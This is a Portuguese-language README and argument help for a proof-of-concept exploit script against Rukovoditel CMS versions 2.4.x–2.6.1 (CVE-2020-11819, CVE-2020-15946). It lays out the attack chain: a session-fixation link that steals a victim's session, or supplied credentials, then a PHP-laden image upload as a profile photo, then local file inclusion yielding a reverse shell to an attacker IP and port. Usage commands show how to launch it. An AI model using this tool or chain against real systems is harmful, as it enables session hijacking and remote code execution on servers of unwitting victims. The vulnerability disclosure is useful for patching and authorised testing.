
Prova de conceito para CVE-2020-11819 e CVE-2020-15946
Prova de conceito para CVE-2020-11819 e CVE-2020-15946. Testado no Rukovoditel 2.4.x, 2.5.x e 2.6.1
Este exploit possui dois modos de execução, utilizando a vulnerabilidade de fixação de sessão (CVE-2020-15946) ou usando as credenciais de acesso de qualquer conta em qualquer perfil. Com a opção --type L, este script criará um link malicioso. Se o link for acessado em um navegador pela vítima, um identificador de sessão arbitrário será definido, que será usado para roubar sua sessão após o upload de uma imagem com conteúdo PHP no perfil de foto, e então usar inclusão de arquivo local (CVE-2020-11819) para obter um shell reverso; ou, com as opções --type C -u <usuário> -p , você pode fornecer credenciais, carregar a imagem com conteúdo PHP e usar inclusão de arquivo local (CVE-2020-11819) para alcançar a execução de código.
Dica: lembre-se de verificar se o módulo de registro está ativado ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
RCE pós-autenticação para rukovoditel, versão do script 1.0
argumentos opcionais:
-h, --help exibe esta mensagem de ajuda e sai
-t URL, --target URL URL/caminho completo para o CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Nome de usuário para autenticação
-p PASSWORD, --password PASSWORD Senha para autenticação
-a TYPE, --type TYPE Use -a L para gerar o link e roubar a sessão, ou use -a C se você tiver credenciais de acesso ao aplicativo web
--ip IP_ATTACKER IP do atacante para shell reverso!
--port PORT_ATTACKER Porta para conexão do shell reverso
--proxy PROXY Configurar proxy http para depuração http://127.0.0.1:8080